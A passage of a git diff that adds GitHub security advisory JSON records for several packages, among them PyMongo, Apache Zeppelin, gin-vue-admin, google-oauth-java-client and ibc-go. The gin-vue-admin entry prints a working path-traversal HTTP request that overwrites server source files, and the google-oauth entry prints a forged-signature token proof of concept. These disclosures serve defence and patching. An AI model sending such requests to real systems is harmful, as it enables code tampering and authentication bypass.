"https://github.com/contao/contao/commit/73a2770e2d3535ec9f1b03d54be00e56ebb8ff16" + }, + { + "type": "WEB", + "url": "https://github.com/contao/contao/commit/79b7620d01ce8f46ce2b331455e0d95e5208de3d" + }, + { + "type": "WEB", + "url": "https://contao.org/en/security-advisories/session-cookie-disclosure-in-the-crawler" + }, + { + "type": "PACKAGE", + "url": "https://github.com/contao/contao" + }, + { + "type": "WEB", + "url": "https://github.com/contao/contao/blob/14e9ef4bc8b82936ba2d0e04164581145a075e2a/core-bundle/src/Resources/contao/classes/Crawl.php#L129" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-200" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-04-09T15:50:59Z", + "nvd_published_at": "2024-04-09T16:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/04/GHSA-cr6f-gf5w-vhrc/GHSA-cr6f-gf5w-vhrc.json b/advisories/github-reviewed/2024/04/GHSA-cr6f-gf5w-vhrc/GHSA-cr6f-gf5w-vhrc.json new file mode 100644 index 00000000000..587926acb69 --- /dev/null +++ b/advisories/github-reviewed/2024/04/GHSA-cr6f-gf5w-vhrc/GHSA-cr6f-gf5w-vhrc.json @@ -0,0 +1,69 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cr6f-gf5w-vhrc", + "modified": "2024-04-08T15:40:17Z", + "published": "2024-04-06T06:31:08Z", + "aliases": [ + "CVE-2024-21506" + ], + "summary": "PyMongo Out-of-bounds Read in the bson module", + "details": "Versions of the package pymongo before 4.6.3 are vulnerable to Out-of-bounds Read in the bson module. Using the crafted payload the attacker could force the parser to deserialize unmanaged memory. The parser tries to interpret bytes next to buffer and throws an exception with string. If the following bytes are not printable UTF-8 the parser throws an exception with a single byte.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "pymongo" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "4.6.3" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-21506" + }, + { + "type": "WEB", + "url": "https://github.com/mongodb/mongo-python-driver/commit/56b6b6dbc267d365d97c037082369dabf37405d2" + }, + { + "type": "WEB", + "url": "https://gist.github.com/keltecc/62a7c2bf74a997d0a7b48a0ff3853a03" + }, + { + "type": "PACKAGE", + "url": "https://github.com/mongodb/mongo-python-driver" + }, + { + "type": "WEB", + "url": "https://security.snyk.io/vuln/SNYK-PYTHON-PYMONGO-6370597" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-125" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-04-08T15:40:17Z", + "nvd_published_at": "2024-04-06T05:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/04/GHSA-frc2-w2cc-x794/GHSA-frc2-w2cc-x794.json b/advisories/github-reviewed/2024/04/GHSA-frc2-w2cc-x794/GHSA-frc2-w2cc-x794.json new file mode 100644 index 00000000000..84fd9197294 --- /dev/null +++ b/advisories/github-reviewed/2024/04/GHSA-frc2-w2cc-x794/GHSA-frc2-w2cc-x794.json @@ -0,0 +1,61 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-frc2-w2cc-x794", + "modified": "2024-04-09T18:53:17Z", + "published": "2024-04-09T12:30:47Z", + "aliases": [ + "CVE-2024-3046" + ], + "summary": "Eclipse Kura LogServlet vulnerability", + "details": "In Eclipse Kura LogServlet component included in versions 5.0.0 to 5.4.1, a specifically crafted request to the servlet can allow an unauthenticated user to retrieve the device logs. Also, downloaded logs may be used by an attacker to perform privilege escalation by using the session id of an authenticated user reported in logs.\n\n\n\n\nThis issue affects org.eclipse.kura:org.eclipse.kura.web2 version range [2.0.600, 2.4.0], which is included in Eclipse Kura version range [5.0.0, 5.4.1]\n\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.eclipse.kura:org.eclipse.kura.web2" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.0.600" + }, + { + "last_affected": "2.4.0" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3046" + }, + { + "type": "PACKAGE", + "url": "https://github.com/eclipse/kura" + }, + { + "type": "WEB", + "url": "https://gitlab.eclipse.org/security/vulnerability-reports/-/issues/188" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-303" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-04-09T18:53:17Z", + "nvd_published_at": "2024-04-09T10:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/04/GHSA-g64r-xf39-q4p5/GHSA-g64r-xf39-q4p5.json b/advisories/github-reviewed/2024/04/GHSA-g64r-xf39-q4p5/GHSA-g64r-xf39-q4p5.json new file mode 100644 index 00000000000..80f0145e938 --- /dev/null +++ b/advisories/github-reviewed/2024/04/GHSA-g64r-xf39-q4p5/GHSA-g64r-xf39-q4p5.json @@ -0,0 +1,69 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-g64r-xf39-q4p5", + "modified": "2024-04-09T16:20:41Z", + "published": "2024-04-09T09:31:12Z", + "aliases": [ + "CVE-2024-31860" + ], + "summary": "Apache Zeppelin Path Traversal vulnerability", + "details": "Improper Input Validation vulnerability in Apache Zeppelin.\n\nBy adding relative path indicators (e.g `..`), attackers can see the contents for any files in the filesystem that the server account can access. \nThis issue affects Apache Zeppelin from 0.9.0 before 0.11.0.\n\nUsers are recommended to upgrade to version 0.11.0, which fixes the issue.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.apache.zeppelin:zeppelin-server" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0.9.0" + }, + { + "fixed": "0.11.0" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-31860" + }, + { + "type": "WEB", + "url": "https://github.com/apache/zeppelin/pull/4632" + }, + { + "type": "WEB", + "url": "https://github.com/apache/zeppelin/commit/f025a697c1d1d0264064d5adf6cb0b20d85041b6" + }, + { + "type": "PACKAGE", + "url": "https://github.com/apache/zeppelin" + }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread/c0zfjnow3oc3dzc8w5rbkzj8lqj5jm5x" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-04-09T16:20:41Z", + "nvd_published_at": "2024-04-09T09:15:26Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/04/GHSA-ggp5-28x4-xcj9/GHSA-ggp5-28x4-xcj9.json b/advisories/github-reviewed/2024/04/GHSA-ggp5-28x4-xcj9/GHSA-ggp5-28x4-xcj9.json new file mode 100644 index 00000000000..ec0c1234a55 --- /dev/null +++ b/advisories/github-reviewed/2024/04/GHSA-ggp5-28x4-xcj9/GHSA-ggp5-28x4-xcj9.json @@ -0,0 +1,76 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-ggp5-28x4-xcj9", + "modified": "2024-04-09T21:12:27Z", + "published": "2024-04-09T16:18:02Z", + "aliases": [ + "CVE-2024-31455" + ], + "summary": "Minder GetRepositoryByName data leak", + "details": "### Impact\nA recent refactoring added the ability to get GitHub repositories registered to a project without specifying a specific provider. Unfortunately, the SQL query for doing so was missing parenthesis, and would select a random repository.\n\n### Patches\nPatched in #2941\n\n### Workarounds\nRevert prior to `5c381cf`, or roll forward past `2eb94e7`\n\n### References\nN/A", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/stacklok/minder" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0.0.39" + }, + { + "fixed": "0.0.40" + } + ] + } + ], + "versions": [ + "0.0.39" + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/stacklok/minder/security/advisories/GHSA-ggp5-28x4-xcj9" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-31455" + }, + { + "type": "WEB", + "url": "https://github.com/stacklok/minder/pull/2941" + }, + { + "type": "WEB", + "url": "https://github.com/stacklok/minder/commit/11b6573ad62cfdd783a8bb52f3fce461466037f4" + }, + { + "type": "WEB", + "url": "https://github.com/stacklok/minder/commit/5c381cfbf3e4b7ce040ed8511a1fae1a78a0014b" + }, + { + "type": "PACKAGE", + "url": "https://github.com/stacklok/minder" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-200" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-04-09T16:18:02Z", + "nvd_published_at": "2024-04-09T17:16:03Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/04/GHSA-gv3w-m57p-3wc4/GHSA-gv3w-m57p-3wc4.json b/advisories/github-reviewed/2024/04/GHSA-gv3w-m57p-3wc4/GHSA-gv3w-m57p-3wc4.json new file mode 100644 index 00000000000..1fa74a74697 --- /dev/null +++ b/advisories/github-reviewed/2024/04/GHSA-gv3w-m57p-3wc4/GHSA-gv3w-m57p-3wc4.json @@ -0,0 +1,73 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gv3w-m57p-3wc4", + "modified": "2024-04-09T21:12:41Z", + "published": "2024-04-09T16:22:21Z", + "aliases": [ + "CVE-2024-31457" + ], + "summary": "gin-vue-admin background arbitrary code coverage vulnerability", + "details": "### Impact\n\"gin-vue-admin<=v2.6.1 has a code injection vulnerability in the backend. In the Plugin System -> Plugin Template feature, an attacker can perform directory traversal by manipulating the 'plugName' parameter. They can create specific folders such as 'api', 'config', 'global', 'model', 'router', 'service', and 'main.go' function within the specified traversal directory. Moreover, the Go files within these folders can have arbitrary code inserted based on a specific PoC parameter.\"\n\nAffected code: https://github.com/flipped-aurora/gin-vue-admin/blob/746af378990ebf3367f8bb3d4e9684936df152e7/server/api/v1/system/sys_auto_code.go:239. Let's take a look at the method 'AutoPlug' within the 'AutoCodeApi' struct.\n```go\nfunc (autoApi *AutoCodeApi) AutoPlug(c *gin.Context) {\n\tvar a system.AutoPlugReq\n\terr := c.ShouldBindJSON(&a)\n\tif err != nil {\n\t\tresponse.FailWithMessage(err.Error(), c)\n\t\treturn\n\t}\n\ta.Snake = strings.ToLower(a.PlugName)\n\ta.NeedModel = a.HasRequest || a.HasResponse\n\terr = autoCodeService.CreatePlug(a)\n\tif err != nil {\n\t\tglobal.GVA_LOG.Error(\"预览失败!\", zap.Error(err))\n\t\tresponse.FailWithMessage(\"预览失败\", c)\n\t\treturn\n\t}\n\tresponse.Ok(c)\n}\n```\nThe main reason for the existence of this vulnerability is the controllability of the PlugName field within the struct.\n```go\ntype AutoPlugReq struct {\n\tPlugName string `json:\"plugName\"` // 必然大写开头\n\tSnake string `json:\"snake\"` // 后端自动转为 snake\n\tRouterGroup string `json:\"routerGroup\"`\n\tHasGlobal bool `json:\"hasGlobal\"`\n\tHasRequest bool `json:\"hasRequest\"`\n\tHasResponse bool `json:\"hasResponse\"`\n\tNeedModel bool `json:\"needModel\"`\n\tGlobal []AutoPlugInfo `json:\"global,omitempty\"`\n\tRequest []AutoPlugInfo `json:\"request,omitempty\"`\n\tResponse []AutoPlugInfo `json:\"response,omitempty\"`\n}\n```\nPOC:\n```\nPOST /api/autoCode/createPlug HTTP/1.1\nHost: 192.168.31.18:8080\nContent-Length: 326\nAccept: application/json, text/plain, */*\nx-token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJVVUlEIjoiNzJlZWQ4OTUtYzUwOC00MDFiLWIyYzQtMTk2MWMyOTlkOWNhIiwiSUQiOjEsIlVzZXJuYW1lIjoiYWRtaW4iLCJOaWNrTmFtZSI6Ik1yLuWlh-a3vCIsIkF1dGhvcml0eUlkIjo4ODgsIkJ1ZmZlclRpbWUiOjg2NDAwLCJpc3MiOiJxbVBsdXMiLCJhdWQiOlsiR1ZBIl0sImV4cCI6MTcxMjIxMTM4MywibmJmIjoxNzExNjA2NTgzfQ.uq61pJNi4kzUXb8lEkVa7NBCBvp_Ye59fee-TJV_rpE\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36\nx-user-id: 1\nContent-Type: application/json\nOrigin: http://192.168.31.18:8080\nReferer: http://192.168.31.18:8080/\nAccept-Encoding: gzip, deflate, br\nAccept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,ja;q=0.6\nCookie: x-token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJVVUlEIjoiNzJlZWQ4OTUtYzUwOC00MDFiLWIyYzQtMTk2MWMyOTlkOWNhIiwiSUQiOjEsIlVzZXJuYW1lIjoiYWRtaW4iLCJOaWNrTmFtZSI6Ik1yLuWlh-a3vCIsIkF1dGhvcml0eUlkIjo4ODgsIkJ1ZmZlclRpbWUiOjg2NDAwLCJpc3MiOiJxbVBsdXMiLCJhdWQiOlsiR1ZBIl0sImV4cCI6MTcxMjIyMDA4NiwibmJmIjoxNzExNjE1Mjg2fQ.XVV97Ky17E9pUO_byVgK--FnAp9ye4Tpab2jnma6dBU\nConnection: close\n\n{\"plugName\":\"../../../server/\",\"routerGroup\":\"111\"\t,\"hasGlobal\":true,\"hasRequest\":false,\"hasResponse\":false,\"global\":[{\"key\":\"1\",\"type\":\"1\",\"desc\":\"1\"},{\"key\":\"type\",\"value\":\"faspohgoahgioahgioahgioashogia\",\"desc\":\"1\",\"type\":\"string\"}],\"request\":[{\"key\":\"\",\"type\":\"\",\"desc\":\"\"}],\"response\":[{\"key\":\"\",\"type\":\"\",\"desc\":\"\"}]}\n```\nBy performing directory traversal and creating directories such as api, config, global, model, router, and service within the gin-vue-admin/server directory, an attacker can tamper with the source code and the main.go file. They can potentially overwrite or tamper with the Go source code files located in the directory C:\\代码审计\\server to further compromise the system.\n![image](https://github.com/flipped-aurora/gin-vue-admin/assets/142187061/c2cad65a-6401-41c2-ba0d-6eb5e3760516)\n![image](https://github.com/flipped-aurora/gin-vue-admin/assets/142187061/681ca156-c125-4a9f-9443-825a34a89b2d)\n![image](https://github.com/flipped-aurora/gin-vue-admin/assets/142187061/6870ce90-8166-48c7-a02c-29c4429283d4)\n\n\n### Patches\nPlease wait for the latest patch\n\n### Workarounds\nYou can use the following filtering methods to rectify the directory traversal problem\nif strings.Index(plugPath, \"..\") > -1 {\n        fmt.Println(\"no bypass\",plugPath)\n    }\n### References\nhttps://github.com/flipped-aurora/gin-vue-admin\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:N/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/flipped-aurora/gin-vue-admin/server" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.0.0-20240409100909-b1b7427c6ea6" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/flipped-aurora/gin-vue-admin/security/advisories/GHSA-gv3w-m57p-3wc4" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-31457" + }, + { + "type": "WEB", + "url": "https://github.com/flipped-aurora/gin-vue-admin/commit/b1b7427c6ea6c7a027fa188c6be557f3795e732b" + }, + { + "type": "PACKAGE", + "url": "https://github.com/flipped-aurora/gin-vue-admin" + }, + { + "type": "WEB", + "url": "https://github.com/flipped-aurora/gin-vue-admin/blob/746af378990ebf3367f8bb3d4e9684936df152e7/server/api/v1/system/sys_auto_code.go:239" + }, + { + "type": "WEB", + "url": "https://pkg.go.dev/github.com/flipped-aurora/gin-vue-admin/server?tab=versions" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-04-09T16:22:21Z", + "nvd_published_at": "2024-04-09T18:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/04/GHSA-hw42-3568-wj87/GHSA-hw42-3568-wj87.json b/advisories/github-reviewed/2024/04/GHSA-hw42-3568-wj87/GHSA-hw42-3568-wj87.json new file mode 100644 index 00000000000..18589b20c70 --- /dev/null +++ b/advisories/github-reviewed/2024/04/GHSA-hw42-3568-wj87/GHSA-hw42-3568-wj87.json @@ -0,0 +1,69 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hw42-3568-wj87", + "modified": "2024-04-09T15:11:24Z", + "published": "2024-04-09T15:11:24Z", + "aliases": [ + "CVE-2021-22573" + ], + "summary": "google-oauth-java-client improperly verifies cryptographic signature", + "details": "### Summary\nThe vulnerability impacts only users of the `IdTokenVerifier` class. The verify method in `IdTokenVerifier` does not validate the signature before verifying the claims (e.g., iss, aud, etc.). Signature verification makes sure that the token's payload comes from valid provider, not from someone else.\n\nAn attacker can provide a compromised token with modified payload like email or phone number. The token will pass the validation by the library. Once verified, modified payload can be used by the application. \n\nIf the application sends verified `IdToken` to other service as is like for auth - the risk is low, because the backend of the service is expected to check the signature and fail the request. \n\nReporter: [Tamjid al Rahat](https://github.com/tamjidrahat), contributor\n\n### Patches\nThe issue was fixed in the 1.33.3 version of the library\n\n### Proof of Concept\nTo reproduce, one needs to call the verify function with an IdToken instance that contains a malformed signature to successfully bypass the checks inside the verify function.\n\n```\n /** A default http transport factory for testing */\n static class DefaultHttpTransportFactory implements HttpTransportFactory {\n public HttpTransport create() {\n return new NetHttpTransport();\n }\n }\n\n// The below token has some modified bits in the signature\n private static final String SERVICE_ACCOUNT_RS256_TOKEN_BAD_SIGNATURE = \n\"eyJhbGciOiJSUzI1NiIsImtpZCI6IjJlZjc3YjM4YTFiMDM3MDQ4NzA0MzkxNmFjYmYyN2Q3NG\" +\n\"VkZDA4YjEiLCJ0eXAiOiJKV1QifQ.eyJhdWQiOiJodHRwczovL2V4YW1wbGUuY29tL2F1ZGllbm\" +\n\"NlIiwiZXhwIjoxNTg3NjMwNTQzLCJpYXQiOjE1ODc2MjY5NDMsImlzcyI6InNvbWUgaXNzdWVy\" +\n\"Iiwic3ViIjoic29tZSBzdWJqZWN0In0.gGOQW0qQgs4jGUmCsgRV83RqsJLaEy89-ZOG6p1u0Y26\" +\n\"FyY06b6Odgd7xXLsSTiiSnch62dl0Lfi9D0x2ByxvsGOCbovmBl2ZZ0zHr1wpc4N0XS9lMUq5RJ\" + \n\"QbonDibxXG4nC2zroDfvD0h7i-L8KMXeJb9pYwW7LkmrM_YwYfJnWnZ4bpcsDjojmPeUBlACg7tjjOgBFby\" +\n\"QZvUtaERJwSRlaWibvNjof7eCVfZChE0PwBpZc_cGqSqKXv544L4ttqdCnm0NjqrTATXwC4gYx\" + \n\"ruevkjHfYI5ojcQmXoWDJJ0-_jzfyPE4MFFdCFgzLgnfIOwe5ve0MtquKuv2O0pgvg\";\n\nIdTokenVerifier tokenVerifier =\n new IdTokenVerifier.Builder()\n .setClock(clock)\n .setCertificatesLocation(\"https://www.googleapis.com/robot/v1/metadata/x509/integration-tests%40chingor-test.iam.gserviceaccount.com\")\n .setHttpTransportFactory(new DefaultHttpTransportFactory())\n .build();\n\n// verification will return true despite modified signature for versions <1.33.3\ntokenVerifier.verify(IdToken.parse(GsonFactory.getDefaultInstance(), SERVICE_ACCOUNT_RS256_TOKEN_BAD_SIGNATURE));\n\n```\n\n### Remediation and Mitigation\nUpdate to the version 1.33.3 or higher \n\nIf the library used indirectly or cannot be updated for any reason you can use similar IdToken verifiers provided by Google that already has signature verification. For example: \n[google-auth-library-java](https://github.com/googleapis/google-auth-library-java/blob/main/oauth2_http/java/com/google/auth/oauth2/TokenVerifier.java)\n[google-api-java-client](https://github.com/googleapis/google-api-java-client/blob/main/google-api-client/src/main/java/com/google/api/client/googleapis/auth/oauth2/GoogleIdTokenVerifier.java)\n\n### Timeline\nDate reported: 12 Dec 2021\nDate fixed: 13 Apr 2022\nDate disclosed: 2 May 2022\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in the [google-oauth-java-client](https://github.com/googleapis/google-oauth-java-client) repo", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "com.google.oauth-client:google-oauth-client" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.16.0-rc" + }, + { + "fixed": "1.33.3" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/googleapis/google-oauth-java-client/security/advisories/GHSA-hw42-3568-wj87" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-22573" + }, + { + "type": "WEB", + "url": "https://github.com/googleapis/google-oauth-java-client/pull/872" + }, + { + "type": "WEB", + "url": "https://github.com/googleapis/google-oauth-java-client/commit/c634ad4e31cac322bb1aa8a9feb0569749011bf0" + }, + { + "type": "PACKAGE", + "url": "https://github.com/googleapis/google-oauth-java-client" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-347" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-04-09T15:11:24Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/04/GHSA-j496-crgh-34mx/GHSA-j496-crgh-34mx.json b/advisories/github-reviewed/2024/04/GHSA-j496-crgh-34mx/GHSA-j496-crgh-34mx.json new file mode 100644 index 00000000000..e91e39b284a --- /dev/null +++ b/advisories/github-reviewed/2024/04/GHSA-j496-crgh-34mx/GHSA-j496-crgh-34mx.json @@ -0,0 +1,210 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-j496-crgh-34mx", + "modified": "2024-04-05T17:16:01Z", + "published": "2024-04-05T17:16:01Z", + "aliases": [ + + ], + "summary": "ibc-go: Potential Reentrancy using Timeout Callbacks in ibc-hooks", + "details": "**Name**: ASA-2024-007: Potential Reentrancy using Timeout Callbacks in ibc-hooks\n**Component**: ibc-go\n**Criticality**: Critical ([ACMv1](https://github.com/interchainio/security/blob/main/resources/CLASSIFICATION_MATRIX.md): I:Critical; L:AlmostCertain)\n**Affected versions**: < v4.6.0, < v5.4.0, < v6.3.0, < v7.4.0, < v8.2.0\n**Affected users**: Chain Builders + Maintainers\n\n# Summary\n\nThrough the deployment and subsequent use of a malicious CosmWasm contract via IBC interactions, an attacker could potentially execute the same `MsgTimeout` inside the IBC hook for the `OnTimeout` callback before the packet commitment is deleted. On chains where ibc-hooks wraps ICS-20, this vulnerability may allow for the logic of the `OnTimeout` callback of the transfer application to be recursively executed, leading to a condition that may present the opportunity for the loss of funds from the escrow account or unexpected minting of tokens.\n\n# Affected Configurations\n\nChains which satisfy all of the following requirements are considered to be impacted by this vulnerability:\n* Chain is IBC-enabled and uses a vulnerable version of ibc-go\n* Chain is CosmWasm-enabled and allows code uploads for wasm contracts by anyone, or by authorized parties (to a lesser extent)\n* Chain utilizes the ibc-hooks middleware and wraps ICS-20 transfer application\n\n# Next Steps for Impacted Chain Builders and Maintainers\n\nIt is advised to immediately upgrade to the latest patch fix version of ibc-go for your chain. If you have already applied a soft-patch through private coordination, we recommend additionally updating to the latest ibc-go version via normal software upgrade governance.\n\nIf you have not upgraded your chain yet, and you desire to mitigate exposure to this vulnerability in the meantime, it is advisable to limit code uploading for contracts to trusted parties on your chain.\n\n**If your chain only allows permissioned, access-controlled contract uploads, it is still strongly recommended to update to the latest patched ibc-go version for your chain per your normal software upgrade process.**\n\n# Preparing for future coordination\n\nIf your chain would like to be included in future coordination efforts, please ensure your chain has a prominently displayed or otherwise easily available up-to-date email address for technical security contact available. A security.md file in the root of your projects’ code repository should contain this information. Additionally, please test this security contact with an unaffiliated email to ensure it works as expected and can receive emails from outside of your domain.\n\nTo ensure that your chain is included in future impact assessments, please keep your chain information up to date in the [Cosmos Chain Registry](https://github.com/cosmos/chain-registry) with code location, network name, and public RPC and API endpoints in the details.\n\nWe recommend that all chains configure and practice the use of the [Circuit Breaker module](https://docs.cosmos.network/main/build/modules/circuit) in the Cosmos SDK, as future vulnerability notifications may require the use of this mechanism as a mitigation against exploitation.\n\n# Recognition\n\nThis issue was reported to the Cosmos Bug Bounty Program on HackerOne on 3/26/24 by Maxwell Dulin (Strikeout) at [Asymmetric Research](https://www.asymmetric.re/). If you believe you have found a bug in the Interchain Stack or would like to contribute to the program by reporting a bug, please see https://hackerone.com/cosmos.\n\n# Notes\n\nDue to the critical nature of this issue, both the ibc-go team and Amulet independently performed impact assessments for the ecosystem, which informed a risk-driven private patching effort that preceded this public release. This private patching effort significantly reduced the exposure of the ecosystem to this vulnerability. We appreciate the diligence and professionalism of all chains and validators involved with this effort – your ability to move quickly while maintaining confidentiality was instrumental in protecting the wider Interchain Ecosystem. \n\nIf you ever have questions about security coordination efforts, public or private, please reach out to our official communication channel at [security@interchain.io](mailto:security@interchain.io).\n\nFor more information about ibc-go, please see https://ibc.cosmos.network/main.\n\nFor more information about the Interchain Foundation’s engagement with Amulet, please see https://github.com/interchainio/security.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/cosmos/ibc-go/v4" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "4.6.0" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Go", + "name": "github.com/cosmos/ibc-go/v5" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "5.4.0" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Go", + "name": "github.com/cosmos/ibc-go/v6" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "6.3.0" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Go", + "name": "github.com/cosmos/ibc-go/v7" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "7.4.0" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Go", + "name": "github.com/cosmos/ibc-go/v8" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "8.2.0" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Go", + "name": "github.com/cosmos/ibc-go/v3" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "< 4.6.0" + } + }, + { + "package": { + "ecosystem": "Go", + "name": "github.com/cosmos/ibc-go/v2" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "< 4.6.0" + } + }, + { + "package": { + "ecosystem": "Go", + "name": "github.com/cosmos/ibc-go" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "< 4.6.0" + } + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/cosmos/ibc-go/security/advisories/GHSA-j496-crgh-34mx" + }, + { + "type": "WEB", + "url": "https://github.com/cosmos/ibc-go/commit/04275aa77644dec97fb91b749d963c992591b7f7" + }, + { + "type": "WEB", + "url": "https://github.com/cosmos/ibc-go/commit/278fa89f192af04af32d82fd5ef41f84f82edd97" + }, + { + "type": "WEB", + "url": "https://github.com/cosmos/ibc-go/commit/5e2e9ebc2f67df324028dd36a1837ffcc8e6b0dd" + }, + { + "type": "WEB", + "url": "https://github.com/cosmos/ibc-go/commit/a0185df3953070ba5ebcb66735925449d1dbe729" + }, + { + "type": "WEB", + "url": "https://github.com/cosmos/ibc-go/commit/e78b3a2b9c9ce80a67d6b1c2b7f9abcb225cc219" + }, + { + "type": "PACKAGE", + "url": "https://github.com/cosmos/ibc-go" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-696" + ], + "severity": "CRITICAL", + "github_reviewed": true, + "github_reviewed_at": "2024-04-05T17:16:01Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/04/GHSA-j55w-hjpj-825g/GHSA-j55w-hjpj-825g.json b/advisories/github-reviewed/2024/04/GHSA-j55w-hjpj-825g/GHSA-j55w-hjpj-825g.json new file mode 100644 index 00000000000..d3333079efd --- /dev/null +++ b/advisories/github-reviewed/2024/04/GHSA-j55w-hjpj-825g/GHSA-j55w-hjpj-825g.json @@ -0,0 +1,92 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-j55w-hjpj-825g", + "modified": "2024-04-09T18:52:54Z", + "published": "2024-04-09T18:52:54Z", + "aliases": [ + 